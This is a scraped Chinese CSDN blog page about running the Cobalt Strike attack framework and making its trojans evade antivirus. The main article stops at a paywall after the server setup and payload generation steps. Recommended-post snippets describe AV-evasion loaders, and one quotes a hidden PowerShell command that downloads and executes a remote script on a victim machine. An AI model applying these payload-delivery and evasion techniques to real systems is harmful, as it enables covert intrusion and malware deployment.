CS(Cobaltstrike)免杀和使用(附脚本)

最新推荐文章于 2025-05-24 10:31:25 发布
最新推荐文章于 2025-05-24 10:31:25 发布
阅读量1.7w 收藏 184
点赞数 13
CC 4.0 BY-SA版权
分类专栏: 技术干货
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hackzkaq/article/details/119037185
本文详细介绍了Cobaltstrike的免杀方法,包括资源修改、加壳等,结合Restorator工具进行木马伪装。此外,还阐述了如何将Cobaltstrike会话传递给Metasploit,以及利用Cobaltstrike进行提权、伪造Windows登录界面、获取浏览器密码和内网扫描等高级功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一

作者:掌控安全-hpb1分享!

一.Cobaltstrike简介

作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选

fireeye多次分析过实用cobaltstrike进行apt的案例。

Cobaltstrike安装

CS需要一个服务器来进行,我们把它放到服务器上。

然后运行./teaserver ip 密码即可。

图片

然后使用CS客户端连接即可,输入对应ip、端口和密码。

图片

Cobaltstrike生成木马

首先创建监听器

图片

攻击-》生成后门-》windows executable,选择监听点击保存即可生成木马

图片
在这里插入图片描述
在这里插入图片描述

不过CS生成木马已经被杀软加入病毒库,很容易别查杀,所以我们需进行一些免杀操作。

图片

二.常见免杀方式

最低0.47元/天 解锁文章

200万优质内容无限畅学
CS教程
星河梦瑾的博客
10-30 647
这块本来就不是web狗擅长的,而且作为一个web狗也没必要花太多时间来折腾这个,达到能用就行,不要追求全部,能目标就行。首先使用sgn.exe这个脚本生成一个sgn文件,然后再把他放到bypass里面就重新生成一个exe文件即可。这一个可以过火绒但是过不了windows,下面这个是可以过windows但是过不了火绒的。将木马存放在刚刚的bypass的文件夹里。会生成一个patch的文件,改名就可以了。启动后选择自己的需要编译的木马文件。3、在自己的CS里面生成一个脚本。然后等待编译完成即可。
CS-Loader:CS
03-22
CS-避CS,包括python版C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0:目前测试可以过Defender /火绒的静+动,360还没测= =不想装360全家桶了,可以自行测试 下一步开发计划: V1.5:加入C版本CS(已完成) V1.7:加入Powershell的(已完成) V2.0:开发出UI界面 V2.0:开发成在线平台(已完成) PS:在实际使用中发现图形化界面不利于其他工具结合,引用之下命令行的方式更具有扩展性 关于自己写的在线平台,暂不考虑开源,主要是觉得当前的技术还比较薄弱,如果有师傅想体验可以联系我 V3.0:想办法结合更多技术(想去研究下进程注入/文件捆绑,不知道效果怎样) V3.1增加了go版本(可过火绒/ 360 / defender) 依赖环境 Pyt
csscriptCS脚本-C脚本引擎:实时执行C代码,无需编译
最新发布
gitblog_06730的博客
05-24 706
csscriptCS脚本-C脚本引擎:实时执行C#代码,无需编译 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 在.NET开发领域,能够实时执行C#代码而无需经过繁琐的编译过程,对于开发者而言,无疑是一种巨大的效率提升。csscript(cs-script)正是这样一款强大的C#脚本引擎,它让开发者能够直接在Visual Studio环境中执行C#代码,实现快速开发、...
CS——ps1
qinjilll的博客
09-21 1641
❤️🔥🎉。
cs(一)
kuuhh的博客
08-12 703
前言 网上搜了几篇文章复现下操作。 ps1文件 生成ps1文件 将关键字FromBase64String括号内的字符串复制起来。 将下面代码保存改为ps1文件执行 $string = '' $s = [Byte[]]$var_code = [System.Convert]::FromBase64String('刚刚复制的字符串') $s |foreach { $string = $string + $_.ToString()+','} $string > d:\1.txt 代码输出到1.t
CS姿势
YJ_12340的博客
08-03 710
多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意之后的效果是最重要的。
CS之信手拈来
Gamma_lab的博客
08-06 1779
前言 最近搞了一个cs的东西出来,主流的毒软件,某绒,某0,windows defender都轻松过掉,但是把在测试卡巴全方位版时,成功上线之后就死掉了,我怀疑不是内存查,如果是内存查,我把shellcode写进去内存的时候,就应该爆肚了,我觉得还是cs上线之后的行为触发卡巴的毒机制,就哦豁了。 然后我就在github上面找点项目来参考一下,果然找到一个很不错的项目,这里分享给大家。 实践 项目地址: https://github.com/ORCA666/EVA2 根据作者描述,这个项目
Cobalt Strike
06-17
CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。 CS功能 Cobalt Strike可以使用 ...
CobaltStrike4.4.zip
09-15
在这个"CobaltStrike4.4.zip"压缩包中,包含了多个与Cobalt Strike 4.4版本相关的文件,它们在网络安全测试防御演练中扮演着重要角色。 首先,`agscript`可能是指Cobalt Strike的Aggressor Script,这是一种...
Cobalt Strike 4.8 Full Black Edition
06-23
Cobalt Strike是一款广泛应用于网络安全测试、红队操作漏洞利用模拟的专业工具,其4.8 Full Black Edition是该软件的一个版本。这个版本通常包含了所有功能,并可能包含一些额外的特性或者更新,专为安全研究人员...
CobaltStrike4.5,渗透利器
12-17
`cobaltstrike.store`文件可能是存储自定义模块、负载或者其他配置信息的地方,这些信息对个性化优化Cobalt Strike的使用非常有用。 总的来说,Cobalt Strike 4.5是一个强大的渗透测试套件,它的功能涵盖了攻击链...
必备工具cs32asm
03-03
工具cs32大家不会陌生吧 用于特征码的 填充修改 必备
CS
anwen12的博客
02-06 5391
Cobaltstrike 一、基础使用 ./teamserver 192.168.43.224 123456 启动服务器端 在windows下的链接 双击bat文件即可 在linux下 ./start.sh 让目标机器链接上teamserver 1.设置好监听器 2.生成攻击载荷 url它是个文件路径,就是让目标(受害者)通过地址下载恶意脚本 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring
CobaltStrike使用插件实现
m0_74025111的博客
04-24 1169
责声明:本工具仅供安全研究教学目的使用,用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任,且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。找小的 ico 图标,比如 5kb、10kb 的。Cobalt Stirke 插件,依赖 nim。导入插件,点击Script Manager。启动cs,点击Connect。可以直接生成shell。
1分钟了解Socket(1)
2401_84968612的博客
05-11 297
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
红蓝对抗经验分享:CS姿势
m0_61869253的博客
07-27 644
多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意之后的效果是最重要的。赛门铁克也未报毒,其它软不放图了。但是需要注意的是别使用云沙箱检测。多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意之后的效果是最重要的。
简单快捷的 CS 一键插件 CSx3Ldr
yutianovo的博客
02-20 1012
Cobalt Strike插件
Cobalt Strike(完结)
qq_32445755的博客
04-18 1178
多字节 XOR 或 AES 加密的 shellcode 生成payload 环境 linux python2 工具ShellcodeWrapper 查看python位置 python -c "import sys; print sys.executable" pip2 安装 # 安装setuptools wget https://pypi.python.org/packages/source/s/setuptools/setuptools-18.5.tar.gz tar ..
木马CS与应用开发
没有网络安全就没有国家安全
03-09 756
木马之CobalStrike与应用开发
365CS项目:CobaltStrike 4.0兼容性及脚本整理
综合上述信息,文档或项目《365CS:CobaltStrike相关内容》是一个关于CobaltStrike工具使用技巧、脚本策略的集合,它覆盖了从基础的后门持久化到复杂的权限提升流量隧道建立等多个方面。它也强调了安全性的重要性...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值